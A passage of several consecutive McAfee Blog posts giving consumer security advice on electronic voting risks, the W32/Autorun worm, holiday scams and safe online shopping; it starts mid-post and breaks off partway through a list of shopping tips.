    In email voting, unencrypted emails pose a serious security risk because they can be easily intercepted, spoofed, or altered in transit. When a ballot is sent without encryption, it travels across networks in plain text, allowing cybercriminals to access and modify its contents before it reaches election officials. Attackers also might impersonate legitimate voters by sending forged emails or inject malware into attachments that appear to be ballots.

    The device

    Computers used to send or receive the emails can be compromised to change or block a voter’s choices. When you cast your ballot online, malware can intercept your vote before it even leaves your device. In addition, the receiving computer will need to open attachments sent by unknown users to tally the votes, one of the most common causes of malware infections.

    Credential theft

    Phishing attacks specifically target voting credentials, often through fake election websites or deceptive emails. Multi-factor authentication and government-issued digital certificates provide essential barriers. In 2023, the National Institute of Standards and Technology released its Digital Identity Guidelines that recommended biometric verification combined with secure tokens for high-stakes digital transactions like voting.

    Man-in-the-middle attacks

    Your vote travels across networks where attackers might intercept or modify it. To thwart these attacks and ensure your ballot remains tamper-proof during transmission, end-to-end encryption with cryptographic signatures can be integrated into online voting systems. Advanced protocols such as homomorphic encryption allow vote counting without exposing individual choices.

    Server-side vulnerabilities

    Voting servers face constant attack attempts. Independent security audits, isolated network environments, and blockchain-based verification systems can help maintain integrity. Regular penetration testing, as recommended in the Election Assistance Commission’s 2023 Voluntary Voting System Guidelines, identifies weaknesses before they’re exploited.

    Distributed denial of service

    DDoS attacks can overwhelm voting portals during critical periods. Distributed server architecture, traffic filtering, and backup submission methods could ensure continuous access, while cloud-based solutions provide scalable protection against volume-based attacks.

    Ballot secrecy

    Online systems must balance verification with privacy. Protocols such as zero-knowledge proof could allow voters to confirm that their ballot was counted without revealing their choices. Anonymous credential systems separate voter identity from vote content.

    Auditability challenges

    Digital voting requires verifiable paper trails or cryptographic receipts. This can be addressed with voter-verified paper audit trails (VVPAT) and risk-limiting audits that provide the transparency necessary for public confidence.

    Cyber threats to voting abound long before Election Day

    In this digital age, threats to the voting process start well before election day. Cybercriminals take advantage of the campaign fever when citizens turn to technology for updates on the election process or news about running candidates.

    Amid all this, your role as a voter includes staying informed about these protections and choosing secure voting methods when available or legitimate information sources. Democracy thrives when citizens understand both the possibilities and precautions of digital participation.

    • Fake voter registration websites: Scammers create convincing look-alike sites that mimic official election portals to steal your personal information. These sites often appear in search results with urgent messaging about registration deadlines, but they’re designed to harvest your data for identity theft or voter suppression purposes.
    • Phishing texts and emails about “polling changes”: You might receive official-looking messages claiming your polling location has changed, voting has been extended, or you need to “confirm” your registration via text or email. These communications often create false urgency to trick you into clicking malicious links or sharing sensitive information.
    • Impersonation of election officials: Scammers pose as election workers, poll supervisors, or government officials via phone calls, texts, or door-to-door visits. They may claim there are problems with your registration, then request personal information to “verify” your eligibility.
    • Malinformation hotlines: Fraudulent phone lines spread false information about voting procedures, dates, or requirements. These services intentionally provide incorrect details to discourage voting or cause confusion about the electoral process.
    • Political donation fraud: Fake political organizations and candidates set up fraudulent donation sites that look legitimate but funnel your money and financial information directly to scammers. These sites often use names similar to real campaigns or causes to deceive donors.

    Your role in protecting election integrity

    Every voter plays a role in ensuring elections remain fair, secure, and transparent. By following proper voting procedures, verifying information through official sources, and reporting suspicious activity, you help strengthen trust in the system. Small actions can make a big difference in protecting the integrity of every vote.

    • Plan your preferred voting method: Before Election Day arrives, take time to plan how you’ll cast your ballot—whether it’s in person at your local polling place, by mail, or through accessible voting options available in your state. If you’re an overseas military or citizen, research your state’s UOCAVA procedures. Knowing this could help you avoid last-minute issues that might force you to bypass safe voting practices.
    • Confirm your voter registration status at your official state portal: This quick step ensures that your information—such as your name, address, and polling location—is accurate and up to date, and helps you avoid surprises like being listed under the wrong district or finding out you’re not registered at all.
    • Verify your polling location through official channels: This ensures you’re voting at legitimate facilities with properly managed systems. When available, choose paper backup options or locations that use voter-verified paper audit trails, which provide physical evidence of your vote that can’t be altered digitally.
    • Keep your personal devices secure during election periods: You can do this by updating software, using strong passwords, and being cautious about election-related apps, websites, or messages that aren’t from official government sources.
    • Stay alert for potential vulnerabilities: As a voter or observer, you can: verify polling place seals are intact, confirm machines display zero totals before voting begins, observe that poll workers follow proper procedures, and report any irregularities to election officials immediately.

    Key tips to verify legitimate communication during election season

    Practicing good cybersecurity hygiene helps safeguard not only your information but also the integrity of democratic participation. Here are some key guidelines to stay secure online and protect your vote.

    • Official election information only comes from verified .gov websites: Scammers often create legitimate-looking websites to trick voters into sharing personal data or clicking malicious links. When searching for election details, always rely on official .gov domains. These are verified and maintained by state and local election authorities, offering information that is accurate, secure, and up to date.
    • Contact your state or local election office directly using official phone numbers: For voting-related questions, contact your state or local election office directly using details listed on verified .gov websites to ensure you receive accurate local information. Do not rely on social media, emails, or unofficial websites, as scammers often use these fake hotlines to collect personal data or sow disinformation.
    • Deal only with verified election officials: Imposters may pose as officials through phone calls, emails, or even in person to collect your personal data or influence your vote. To confirm legitimacy, check any communication from an official .gov email address or website, verified government phone line, or your local election office.
    • Verify “urgent” voting information through multiple official sources: During election season, scammers often spread “urgent” messages or “breaking news” to sow panic or confusion—such as changes in polling hours or locations—to suppress voter turnout. Always verify updates through official sources, such as your state’s .gov election website, local election office, or trusted news outlets.
    • Update all your devices with the latest security patches: Before researching candidates, browsing election information, or logging into voter portals, make sure all your devices are running the latest versions. Security patches fix vulnerabilities that hackers can exploit to install malware or steal personal data.
    • Use strong, unique passwords for voter-related accounts or portals. When creating strong, unique passwords for each election-related site you use, especially government or voter registration portals, use a mix of letters, numbers, and symbols, and avoid personal details like birthdays or pet names. Password managers can help you generate and store complex passwords, reducing the risk of credential theft.
    • Enable two-factor authentication (2FA) wherever possible. Enabling 2FA on your email and voter-related accounts significantly strengthens your defense against unauthorized access. Even if hackers obtain your password, they won’t be able to log in without this additional confirmation.
    • Report suspected election-related scams to your local officials and relevant authorities: If you encounter a suspicious website, message, or phone call related to voting—report it to your state or local election office, the Cybersecurity and Infrastructure Security Agency or the Federal Trade Commission. Authorities track malicious activity and protect other voters from falling victim to similar schemes.

    These multi-layered protections work together to maintain election integrity, though gaps can emerge when procedures aren’t consistently followed or when oversight is insufficient.

    Final thoughts

    While online voting systems can’t be written off, ongoing cybersecurity challenges don’t bode well for the immediate future of these platforms.

    While technology has transformed nearly every aspect of modern life—from shopping to banking, and working—applying that convenience to the voting booth still presents challenges. Security, transparency, and public trust remain at the core of any democratic process, and rushing toward online or paperless voting without upholding these principles could be harmful.

    Progress is steadily being made, however, with advances in encryption and digital identity frameworks. With careful design, rigorous testing, and strong oversight, technology can enhance the safeguards that underpin election integrity.

    For now, the most effective way to protect democracy is through awareness and participation. Stay informed about your state’s voting systems, verify election information only through official sources, and remain alert to misinformation and scams. Each responsible voter plays a part in strengthening the integrity of elections.

    The post Hack the Vote: Pros and Cons of Electronic Voting appeared first on McAfee Blog.

    Crush that Worm before It Creeps into Your Computer

    By: McAfee
    virus check on screen

    Some years ago, a highly infectious computer worm called W32/Autorun was discovered to be infecting Windows computers. Unlike a virus, a worm such as W32/Autorun doesn’t steal anything from your computer. Instead, it spreads rapidly and opens as many security holes as possible to allow hackers to install a different form of malware that will eventually steal information, money, or both.

    While this worm is less widespread today, it continues to infect older Windows operating systems that are not regularly updated. This guide will take a closer look at how the worm spreads and outline preventive measures to avoid infection.

    Older Windows versions at risk

    Autorun worms primarily affect older Windows systems such as Windows XP, Vista, and early versions of Windows 7, which had AutoRun enabled by default. Microsoft recognized this security vulnerability and significantly restricted AutoRun capabilities in newer Windows versions, but millions of older systems remain at risk if they haven’t been properly updated or configured.

    When an autorun worm infects your system, it can compromise both your files and privacy in several ways by stealing personal documents, capturing passwords and banking information, or installing additional malware that monitors your online activities. Some variants encrypt your files for ransom, while others turn your computer into part of a botnet used for spam or cyberattacks. The infection can also spread to family members, friends, or colleagues when you share USB drives or connect to shared networks.

    While this worm is less common today due to security updates in newer Windows operating systems, the concept of autorun malware is still relevant, often evolving into new forms that spread via malicious downloads, USB drives, or network shares. These forms use clever file drops and social engineering, with detection still relying on robust antivirus and user caution.

    Key ways W32/Autorun bypasses your computer’s defenses

    W32/Autorun is effective because it exploits everyday behaviors and outdated system features. Instead of forcing its way into your computer, it relies on built-in Windows functionality and simple tricks to get users to let it in, slip past basic defenses, and infect systems.

    Easy way in via Windows AutoRun

    An autorun worm spreads, as its name suggests, automatically through removable storage devices such as USB drives, external hard drives, and network shares. It takes advantage of Windows’ AutoRun and AutoPlay features to secretly execute itself when you connect the removable device to your computer that has AutoRun. A dialog box then pops up asking if you want to automatically run whatever is on the device. When you unsuspectingly click “run,” you’ve authorized the W32/Autorun worm. Once active, the worm copies itself to other connected drives and network locations, rapidly spreading to any system. While this feature was not included in Windows 8 for security reasons just like this, it still exists on many older machines that haven’t been updated in a while.

    Fake folders lure victims in

    Even if you don’t have Windows AutoRun enabled in your device, W32/Autorun disguises itself as interesting imposter files and folders with names like “porn” and “sexy” in infected flash drives or shared internet connections to trick you into downloading the worm. Once you click on the malicious file, it executes AutoRun and infects your computer.

    The worm can also change your computer’s settings to allow it to run every time you boot up. Some variants even disable Windows updates to prevent the system from downloading security patches and ensure the worm can do its job of infecting every device your computer comes into contact with, opening the door for any virus a hacker wants to install at your expense.

    Symptoms of a W32/Autorun worm infection

    A W32/Autorun worm infection works quietly in the background, spreading to connected devices and weakening your system’s defenses without triggering immediate alarms. However, there are subtle signs that indicate the infection. Recognizing these early symptoms can help you take action to block the worm’s activities before it causes irreparable damage to your device and network:

    • Slow performance: Your computer or internet connection may slow down due to the high processing usage that the worm requires as it actively searches for drives to infect.
    • Presence of unfamiliar files/folders: The worm creates copies of itself and configuration files on infected drives, sometimes disguised with random names or enticing names such as “porn” or “sexy”.
    • System instability: Your computer may begin freezing, crashing, or restarting unexpectedly as the worm runs multiple background processes while consuming system resources and interfering with normal operating functions.
    • Modified settings: You might notice unexpected changes to your desktop, folder views, or system preferences without your input. These modifications are often made to hide malicious files or make it easier for the worm to run automatically.
    • Loss of access to some features: Tools like Task Manager, Registry Editor, or Folder Options may suddenly become inaccessible. The worm disables these features to prevent you from stopping its processes or removing it manually.
    • Disabled antivirus software or Windows updates: Your security software may stop working properly, or Windows updates may be turned off without explanation. This enables the worm to block security patches and scans that could remove it.
    • Unusual network activity: You may notice unexplained internet traffic even when you’re not actively using your device. The worm could be contacting remote servers to report successful infections or download additional malicious components.
    • Diminished storage space: Available disk space may shrink rapidly with no clear reason. This happens because the worm repeatedly copies itself across your system and connected drives.

    Consequences of the W32/Autorun worm

    The impact of the W32/Autorun worm can vary depending on the specific variant, ranging from minor annoyances to severe system compromise:

    • System damage and further infection: The W32/Autorun worm acts as an entry point for attackers to silently install more dangerous malware, including data-stealing Trojans or destructive viruses.
    • Data loss and corruption: Some variants can delete important files or corrupt stored data, making documents, photos, or applications unusable or permanently unreadable, even after the worm is removed.
    • Disruption of operations: Because the worm consumes large amounts of processing power and memory in the background, it can slow down your device’s performance and stall programs to make daily computing tasks difficult.
    • Unauthorized access and information theft: Certain W32/Autorun variants are capable of monitoring your online activity, including logging keystrokes, capturing login credentials, and stealing financial details or personal data.
    • Aesthetic changes: Less destructive versions of the worm may focus on annoying changes such as altered desktop backgrounds, browser settings, or system appearance.

    How to Prevent a W32/Autorun Infection

    Preventing a W32/Autorun infection is largely about closing the simple security gaps the worm relies on to spread. By taking these steps, you can significantly reduce the chances of this worm gaining access to your computer.

    1. Disable AutoRun

    If your computer is still prompting you to automatically run applications each time you insert a CD, connect to a new network, or plug in a flash drive, update your computer as soon as possible. Visit the Microsoft website to learn how to disable AutoRun for your specific version of Windows.

    2. Beware of shared removable devices

    Remember that this worm is highly infectious. If you share a flash drive with a friend whose computer is infected, that flash drive will carry the worm to your computer. If you do need to share a device, make sure AutoRun is disabled before you plug it in, and check that your security protection has the capability to scan new drives to prevent you from clicking on infected files.

    3. Use reliable antivirus

    While the first two tips focus on prevention, a reliable security solution will not only prevent a W32/Autorun infection, but also remove it from your computer. Solutions like McAfee+ will catch the W32/Autorun worm bug and other similar malware, protecting you from accidentally spreading it to friends and family.

    Final thoughts

    Autorun worms represent a persistent threat that combines old vulnerabilities with modern attack techniques. Newer security measures may have reduced their impact, but these worms continue to target systems with outdated configurations through the continued use of removable media. This is why keeping systems updated and being cautious with external devices are important habits to apply.

    In addition, you can protect yourself with proper security practices: disable AutoRun on older systems, keep your antivirus software updated, scan external devices before accessing their contents, and avoid connecting unknown USB drives to your computer.

    The post Crush that Worm before It Creeps into Your Computer appeared first on McAfee Blog.

    The Top 12 Scams Of Christmas To Watch Out For

    By: McAfee
    Holiday Shopping Online

    The holidays are just around the corner and amid the hustle and bustle, many of us will fire up our devices to go online, order gifts, plan travel, and spread cheer. But while we’re getting festive, the cybercriminals are getting ready to take advantage of the influx of your good cheer to spread scams and malware.

    With online shopping expected to grow by 7.9% year-on-year in the U.S. alone in 2025, according to Mastercard, and more people than ever using social media and mobile devices to connect, the cybercriminals have a lot of opportunities to spoil our fun. Using multiple devices provides the bad guys with more ways to access your valuable “digital assets,” such as personal information and files, especially if the devices are under-protected.

    In this guide, let’s look into the 12 most common cybercrimes and scams of Christmas, and what you can do to keep your money, information, and holiday spirit safe.

    The psychology of holiday fraud

    The festive atmosphere, continued increase in online shopping activity, and charitable spirit that define the holidays create perfect conditions for scammers to exploit your generosity and urgency.

    Not surprisingly, digital criminals become more active and professional during this period, driven even more by the increasing power of artificial intelligence. A new McAfee holiday shopping report revealed that 86% of consumers surveyed receive a daily average of 11 shopping-related text or email messages that seem suspicious. This includes 3 scam texts, 5 emails, and 3 social media messages. Meanwhile, 22% admit they have been scammed during a holiday season in the past.

    Their scams succeed because they exploit the psychological and behavioral patterns that are rife during the holidays. The excitement and time pressure of holiday shopping often prevail over our usual caution, while the emotional aspects of gift-giving and charitable donations can be exploited and move us to be more generous. Meanwhile, scammers understand that you’re more likely to make quick purchasing decisions when the fear of missing out on limited-time offers overtakes your judgment or when you’re rushing to find the perfect gift before it’s too late.

    Overall, the frenzied seasonal themes create an environment where criminals can misuse the urgency of their fake offers and cloud our judgment, making fraudulent emails and websites appear more legitimate, while you’re already operating under the stress of holiday deadlines and budget concerns. After all, holiday promotions and charity appeals are expected during this time of year.

    Now that you understand the psychology behind the scams, it’s time to become more aware of the common scams that cybercriminals run during the holiday season.

    The 12 Scams of Christmas

    As you head online this holiday season, stay on guard and stay aware of scammers’ attempts to steal your money and your information. Familiarize yourself with the “12 Scams of Christmas” to ensure a safe and happy holiday season:

    1. Social media scams

    Many of us use social media sites to connect with family, friends, and co-workers over the holidays, and the cybercriminals know that this is a good place to catch you off guard because we’re all “friends,” right? Here are some ways that criminals will use these channels to obtain shoppers gift money, identity or other personal information:

    • Be careful when liking pages, clicking on fake alerts from friends’ accounts that have been hacked, taking advantage of raffles, ads, and deals that you get from “friends,” or installing suspicious “holiday deal” apps that give your private data away. These links can automatically download malware onto your computer that can steal personal information.
    • Ads announcing special discounts for popular gifts are especially popular, and utilize blind, shortened links, many of which could easily be malicious. Criminals are getting savvier with authentic-looking social ads and deals that direct you to fake websites. To take advantage of the deals or contests, scammers will ask you for personal information that will enable them to obtain your credit card number, email address, phone number, or home address.

    2. Malicious mobile apps

    As the popularity of smartphone apps has grown, so have the chances of you downloading a malicious application that steals your information or sends premium-rate text messages without your knowledge. Apps ask for more permissions than they need, such as access to your contacts or location.

    If you unwrap a new smartphone this holiday season, make sure that you only download applications from official app stores and check other users’ reviews, as well as the app’s permission policies, before downloading. Software, such as McAfee Mobile Security, can also help protect you against dangerous apps.

    3. Travel scams

    Many of us travel to visit family and friends over the holidays. We begin our journey online by looking for deals on airfare, hotels, and rental cars. Before you book, keep in mind that scammers are looking to hook you with phony travel webpages with too-fantastic deals—beautiful pictures and rock-bottom prices—to deceive you into handing over your financial details and money.

    Even when you’re already on the road, you need to be careful. Sometimes, scammers who have gained unauthorized access to hotel Wi-Fi will release a malicious pop-up ad on your device screen, and prompt you to install software before connecting. If you agree to the installation, it downloads malware onto your machine. To thwart such an attempt, it’s important that you perform a security software update before traveling.

    4. Holiday spam/phishing

    You are probably already familiar with email phishing and SMiShing messages containing questionable offers and links. The scammer will mimic a legitimate organization offering cheap Rolex watches and luxury products as the “perfect gift” for that special someone, or send a message posing as your bank with a holiday promo and try to lure you into revealing information or direct you to a fake webpage. Never respond to these scams or click on an included link. Be aware that real banks won’t ask you to divulge personal information via text message. If you have any questions about your accounts, you should contact your bank directly.

    5. Quishing

    QR code phishing, or “quishing,” has emerged as a significant new threat during holiday shopping seasons. In this scam method, cybercriminals place malicious QR codes in holiday advertisements posted on social media or printed flyers, parking meters and payment kiosks at shopping centers, or at restaurant tables during holiday dining. They could also email attachments claiming to offer exclusive holiday deals or fake shipping labels placed over legitimate tracking QR codes.

    6. The new iPad, iPhone, and other hot holiday gift scams

    The kind of excitement and buzz surrounding Apple’s new iPad and iPhone is just what cybercrooks dream of when they plot their scams. They will mention must-have holiday gifts in dangerous links, phony contests, and phishing emails to grab your attention. Once they’ve caught your eye, they will again try to get you to reveal personal information or click on a dangerous link that could download malware onto your machine. Be suspicious of any deal mentioning hot holiday gift items—especially at extremely low prices—and try to verify the offer with the real retailer involved.

    7. Bogus HR and bonus emails

    Cybercriminals exploit employee expectations of year-end communications by creating fake emails that appear to come from your HR department. These messages often claim to contain annual bonus information, updated benefits packages, or mandatory holiday attendance announcements. These scams are particularly effective because they prey on legitimate employee concerns about compensation, benefits, and personal time off during the holiday season. The emails often feature real-looking company logos, proper formatting, and even references to company policies to increase their credibility.

    8. Bogus gift cards

    Gift cards are probably the perfect gift for some people on your holiday list. Given their popularity, cybercriminals can’t help but want to get in on the action by offering bogus gift cards online. Be wary of buying gift cards from third parties. It’s best to buy from the official retailer. Just imagine how embarrassing it would be to find out that the gift card you gave your mother-in-law was fraudulent!

    9. Phony e-tailers

    No matter what gift you’re looking for, chances are you can find it quickly and easily online, but you still want to be careful in selecting which site to shop. By promoting great deals, phony e-commerce sites will try to convince you to type in your credit card number and other personal details. After obtaining your money and information, you never receive the merchandise, and your personal information is put at risk. To prevent falling victim to bogus e-commerce stores, shop only at trusted and well-known e-commerce sites. If you’re shopping on a site for the first time, check other users’ reviews and verify that the phone number listed on the site is legitimate.

    10. Fake charities

    This is one of the biggest scams of every holiday season. As we open our hearts and wallets, the bad guys will send spam emails and pretend to be a real charity in the hope of getting in on the giving. Their emails will sport a stolen logo and copycat text, or come from an entirely invented charity. If you want to give, it’s always safer to visit the charity’s legitimate website, and do a little research about the charity before you donate.

    11. Dangerous e-cards

    E-cards are a popular way to send a quick “thank you” or holiday greeting. While most e-cards are safe, some are malicious and may contain spyware or viruses that download onto your computer once you click on the link to view the greeting. Before clicking, look for clues that the e-card is legitimate. Make sure it comes from a well-known e-card site by checking the domain name of the included link. Also check to see that the sender is someone you actually know, and that there are no misspellings or other red flags that the card is a fake.

    12. Fake shipping and delivery notices

    With increased package deliveries during the holiday season, fake shipping notifications have become a common attack. These messages claim to be from legitimate shipping companies such as UPS, FedEx, or DHL, informing you of package delivery attempts or shipping delays. To complete the delivery, these notices will ask you to click on malicious links or attachments that will download malware or direct you to fake websites that will steal personal information. The timing of these attacks coincides with legitimate increased shipping activity, making them harder to distinguish from authentic communications. To track your deliveries, it is best to check the shipping company’s real website or through the trusted platform from which you ordered the product.

    Protect yourself from scams during the holidays and year-round

    Knowing about these common scam tactics is only the first step toward protecting yourself and those you care about. The next step is for you to learn and implement practical, effective strategies to stay safe while still enjoying digital holiday shopping and giving.

    • Stay suspicious: Be wary of any offer that sounds extremely unrealistic, such as 90% discounts on luxury brands, and always learn to spot telltale signs of a fake marketing promotion such as low-resolution images, high-pressure tactics, misspellings, poor grammar, or odd links.
    • Practice safe surfing: Find out if a website is potentially dangerous before you click on it by using a safe search plug-in such as McAfee Web Protection, which blocks malware and phishing sites if you accidentally click on a malicious link, alerts you if you type a web address incorrectly and points you in the right direction, and scans your downloads and alerts you if there’s a known risk.
    • Shop mindfully: Stick to reputable e-commerce sites and platforms, and look for a trustmark that indicates that the site has been verified as safe by a reliable third-party. Also, look for a lock symbol beside the HTTPS at the beginning of the web address to see if the site uses encryption to protect your data.
    • Check before clicking: Don’t click on any links in messages from people you don’t know. If you come across a shortened URL, use a URL expander to see where the link directs to before you click.
    • Be cautious of high-pressure tactics: Legitimate businesses and charities will respectfully give you time to make purchase or donation decisions. Be suspicious of organizations that pressure you to buy or give immediately. Charities specifically should be able to provide written information about their programs and financial management.
    • Use strong passwords: Make sure your passwords are at least 12 characters long with randomly combined letters, numbers, and characters. Avoid reusing the same password across your important accounts, and never share your passwords with anyone.
    • Monitor your financial accounts actively: During peak shopping periods, review your bank and credit card statements at least once daily for charges you don’t recognize, even small ones that scammers sometimes use to test stolen card information. Set up account alerts for all transactions, low balances, and any changes to your account information.
    • Use credit instead of debit: When shopping online or in unfamiliar locations, use credit cards rather than debit cards. Credit cards typically offer better fraud protection, and fraudulent charges don’t immediately affect your bank account balance.
    • Monitor your credit reports: Check your credit reports regularly for new accounts or inquiries you didn’t authorize. The FTC provides free annual credit reports through AnnualCreditReport.com, and many services now offer free ongoing credit monitoring.
    • Consider temporary credit freezes: If you’re not planning to apply for new credit during the holidays, consider placing a temporary freeze on your credit reports to prevent scammers from opening new accounts in your name, and you can lift the freeze quickly when needed.
    • Recognize red flags: Holiday-themed phishing attempts abound during the season, making it crucial to identify and avoid suspicious communications. Closely check email addresses and phone numbers from unexpected communications, be suspicious of urgent language, watch for poor grammar and spelling, and don’t just click any link or scan any QR code.
    • Practice safe app downloads and installation: If you gift yourself with a new device this holiday season, download only well-reviewed apps developed by legitimate developers and sourced from official sources such as the Apple App Store, Google Play Store, or Microsoft Store. When installing, limit the app’s permission to only what it needs to function.
    • Keep apps updated: Regularly update your apps to ensure you have the latest security patches. Enable automatic updates when possible, and review what’s being updated periodically. Remove apps you no longer use.
    • Use a complete security solution: With the growing sophistication of scams coming in from all fronts of technology, you will need comprehensive protection with antivirus, antispyware, antispam, and a firewall. McAfee+ can help protect all of your devices—PCs, laptops, smartphones, and tablets—from AI-driven malware, phishing, spyware, and other common and emerging threats.
    • Educate yourself and your family: Keep increasing your knowledge of the latest scams and tricks cybercriminals use so you can recognize and avoid potential attacks. You can find helpful information on the McAfee Blogs and the McAfee Guides.

    Final thoughts

    The holiday season brings joy and connection, but it’s also a time when scammers work hardest to exploit your festive but rushed and distracted spirit. Effective Christmas scam prevention starts with awareness. By slowing down and taking a moment to verify before you click or buy, and using layered cybersecurity protections, you can worry about one less thing and focus on what matters most this season.

    Stay security-conscious without letting fear diminish your holiday enjoyment and pursue your digital holiday activities with the right knowledge and tools. We hope that the specific, actionable protections will help you identify red flags, verify legitimate offers, secure your devices and accounts, and respond effectively to suspicious activity. Stay informed by following trusted sources for the latest cybersecurity tips during the holidays, and make this season about celebrating safely with the people you care about most.

    Send the link to this page to your family and friends to increase their awareness and take steps to protect themselves.

    The post The Top 12 Scams Of Christmas To Watch Out For appeared first on McAfee Blog.

    Helpful Tips for Safe Online Shopping

    By: McAfee
    Shopper using smartphone app

    Thanksgiving—not before Halloween as we see things in stores and online now. It seems like the holiday season and decorations start earlier and earlier every year.

    But one thing that hasn’t changed is that Black Friday is still a big shopping day. With the advent of online shopping has emerged Cyber Monday, another big sale day for online shoppers on the first Monday after Thanksgiving.

    Although many of us may take advantage of these great deals that the holidays offer, we also need to be aware of the risks. Online shopping is a fun and convenient way to make purchases, locate hard-to-find items, and discover bargains, but we need to take steps to protect ourselves.

    This guide looks at the methods and warning signs behind online shopping scams, shows you how to recognize fake shopping apps and websites, and shares tips for staying safe online.

    Online shopping safety amid growing e-commerce concerns

    Online shopping has become a cornerstone of American life. CapitalOne Shopping projects American online spending to reach $1.34 trillion in 2024 and exceed $2.5 trillion in 2030.

    With such a massive sum at stake, cybercriminals are laser-focused on taking a share of it, posing financial risk to the 288 million Americans who shop online. As e-commerce grows, so does fraud. In 2024, e-commerce fraud was valued at $44.3 billion, a number seen to grow by 141% to $107 billion in 2029.

    Be that as it may, there are many smart shopping habits you can apply to dramatically reduce your risk of becoming a victim of online shopping fraud and enjoy the convenience and benefits of online commerce.

    Common online shopping scams

    Online shopping scams are designed to look normal—at first glance—especially during busy sale seasons when we’re distracted by a million preparations, moving fast, and chasing deals. These are the very circumstances that fraudsters bank on to victimize you into taking the bait. Being aware of the common scam indicators will help you pause and think, recognize trouble early, and protect both your money and your personal information.

    • Non-delivery scams: You pay for items that never arrive, often from fake storefronts or fraudulent sellers who disappear with your money. The seller might have required you to pay through a wire transfer, cryptocurrency, or gift card, methods that are indisputable and untraceable. If you check the website, it may look new and have no customer reviews or suspiciously have only perfect 5-star ratings. It may also offer prices that are significantly below market value.
    • Counterfeit goods scams: You receive knock-off products instead of authentic brand-name items, particularly affecting electronics, cosmetics, and luxury goods. On closer inspection, you will notice spelling errors in brand names or product descriptions, the prices seem too good to be true for premium brands, and sellers have no proof of authenticity or authorized dealer status.
    • Bait-and-switch scams: Attractive deals lure you in, but you’re pressured to buy different, more expensive items or receive products that don’t match what was advertised. This type of scam is usually characterized by items that are always “out of stock,” but offer readily available, more expensive alternatives. The seller also applies high-pressure sales tactics or limited-time offers that prevent you from comparison shopping, while the product descriptions are vague or don’t match the images shown.
    • Refund and overpayment scams: In this scheme, scammers will pose as buyers who “accidentally” overpay you for items you’re selling, then request you to refund the difference before their original payment bounces. They will also use payment methods that can be reversed such as checks or money orders, then ask for a refund and suggest sending shipping companies to collect items before the payment clears.
    • Website and marketplace impersonations: Fake websites designed to look like legitimate popular brands can steal your payment information and personal data. Watch out for websites that have slightly misspelled URLs or don’t use secure HTTPS encryption as marked by the padlock icon in your browser, as well as missing or incomplete contact information, privacy policies, or terms of service.
    • Product return fraud: Scammers exploit return policies by selling you used, damaged, or counterfeit items while making returns and refunds difficult or impossible through fake or non-existent customer service. Their return policies are overly complicated, buried in fine print, or require original packaging that wasn’t provided. They will disappear from marketplaces immediately after the return period expires.

    A guide to knowing if a shopping website is legit

    Safe online shopping starts with recognizing the hallmarks of legitimate retailers. Before you enter any payment details, take a moment to verify that the website you’re shopping on is genuine. Scam stores can look polished and convincing, but they often leave behind subtle clues. Here are quick ways to check their authenticity:

    1. Verify the website URL: By typing the URL directly into your browser rather than clicking links from emails or ads, you will avoid typosquatting scams—fake websites with URLs that look almost identical to real retailers, except for slight misspellings. Look for clear return and shipping policies. Read the fine print to understand your rights if something goes wrong.
    2. Confirm physical address and customer service: Real businesses provide multiple ways to contact them, including a physical address, phone number, and email.
    3. Evaluate pricing for realism: The prices are too good to be true, especially for high-demand or hard-to-find items. Many legitimate retailers now offer price-matching policies, allowing you to get market-average or competitive prices.
    4. Check for verified customer reviews: Look for reviews on independent platforms like Google, Yelp, or Trustpilot rather than relying solely on testimonials on the retailer’s website. Cross-reference feedback across multiple platforms.
    5. Ensure secure payment options: Look for HTTPS in the URL and avoid sites that only accept wire transfers, gift cards, peer-to-peer payment apps, or cryptocurrency. For online purchases, check that the seller offers secure payment options with dispute protection, such as digital wallets and/or credit cards.
    6. Research domain age and registration: Use WHOIS lookup tools to check when the domain was registered. Fraudulent sites are usually newly created domains designed to disappear quickly after collecting payments. In addition, established retailers and official brand websites have invested heavily in solid security infrastructure and payment processing, customer protection programs, fraud prevention systems, and long-standing relationships with credit card companies that smaller or unknown sellers often lack.
    7. Check the Better Business Bureau: Search for the seller’s company on the Better Business Bureau to see their rating, complaint history, and accreditation status, and help you identify potential risks before making a purchase.
    8. Pay attention to browser safety warnings: Modern browsers like Chrome, Firefox, and Safari will warn you about potentially dangerous or untrustworthy sites. Google’s Safe Browsing technology blocks millions of unsafe sites daily, so don’t ignore these warnings when they appear. Some comprehensive security tools also include web protection that alert you against dangerous links and downloads, malicious websites, and more.
    9. Verify secure checkout processes: Legitimate sites use SSL (Secure Sockets Layer) encryption during checkout, which you can confirm by looking for “https://” and a lock icon in your browser’s address bar.

    11 Tips for safe holiday shopping online

    • Be extra vigilant: Cybercriminals send millions of fake shopping emails that contain suspicious links, with the aim of exploiting your anxiety over catching that amazing deal or deliveries. For example, you might receive an unexpected “Amazon Prime renewal” email or a text from UPS, FedEx, or other carriers when you didn’t purchase anything online. These phishing emails and texts contain malicious links designed to steal your personal information or install malware on your devices. Don’t click the link. Verify delivery notifications through your account or the carrier’s official website or app, then delete the scam email or text immediately.
    • Stick with trusted sellers: When shopping on marketplaces, stick with your trusted online retailers and sellers with high ratings, extensive review histories, and “fulfilled by” programs where the main platform handles shipping and returns. Download retailer apps directly from official app stores rather than third-party sources, as these include enhanced security features and exclusive customer protections.
    • Check the site’s web address: Always type retailer URLs directly into your browser’s address bar or use your bookmarks. Once you arrive at a site, make sure it is the correct URL such as www.amazon.com and not www.amazan.com. Purchase directly from official brand websites or authorized retailers, and verify seller credentials through the brand’s official dealer locator when shopping on marketplaces.
    • Check that the site is secure: Some people cannot tell if a site is secure. Some things to look for on a secure site include:
      • A web address that starts with HTTPS instead of HTTP, indicating that encryption is used to protect your information.
      • A lock symbol beside the URL, proper SSL certificates, and several contact methods.
      • A security seal, such as the McAfee SECURE™ trustmark, indicating that the site has been scanned and verified as secure by a trusted third party. This security seal indicates that the site will help protect you from identity theft, credit card fraud, spam, and other malicious threats.
    • Pay with a credit card or digital wallet: Credit cards offer better protection against fraud than debit cards. You won’t be liable for fraudulent purchases, while cyberthieves won’t be able to drain your bank account if they get your account log-in credentials. Better yet, use a virtual credit card number or a digital wallet such as Apple Pay or Google Pay to prevent your actual card details from being stored on merchant sites. Also, avoid storing your credit card information on new or questionable sites to reduce your exposure if those sites experience security breaches.
    • Take note of shipping and return policies: Always review shipping timelines, return windows, and refund policies before completing your purchase. Not reading the fine print can leave you stuck with unwanted purchases or unexpected fees.
